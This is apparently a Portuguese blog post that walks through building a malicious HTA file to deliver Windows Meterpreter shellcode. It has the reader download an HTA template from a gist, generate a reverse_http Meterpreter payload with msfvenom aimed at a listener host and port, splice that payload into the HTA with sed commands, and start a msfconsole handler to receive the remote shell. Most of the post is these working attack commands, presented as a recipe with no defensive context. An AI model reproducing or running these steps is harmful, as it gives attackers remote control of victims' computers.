1 - Salve o codigo (Reve_HTTP_Excel.hta) do github em: https://gist.github.com/subTee/e126c6ee847a4d9fcfd7 com o nome RevTcp.hta
- shellcode Execution Via HTA
- Autor: Smith @subTee
- mkdir novaPasta && cd novaPasta
- msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.txt
- Remova a linha de 1 ate 10 e salve o arquivo
- sed "s/^/strCode += '/" msf.txt > novoMsf.txt
- sed "s/$\\\\n'/" novoMsf.txt > novoMsf_3.txt
7 - Abra o codigo RevTcp.hta e remova as linha
- Remova a linhas de 33 ate 70
9 - Na linha 33 procure a palavra Sub Auto_Open() copie esse nome e cole na linha 72 onde voce emcontra a palavra ExecShell, faça a subistituição e salve o seu arquivo
10 - abra o seu msfconsole, Comando:
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LPORT 8080;set LHOST 192.168.56.103;set ExitOnSession false; exploit -j"
Video:

Comentários
Postar um comentário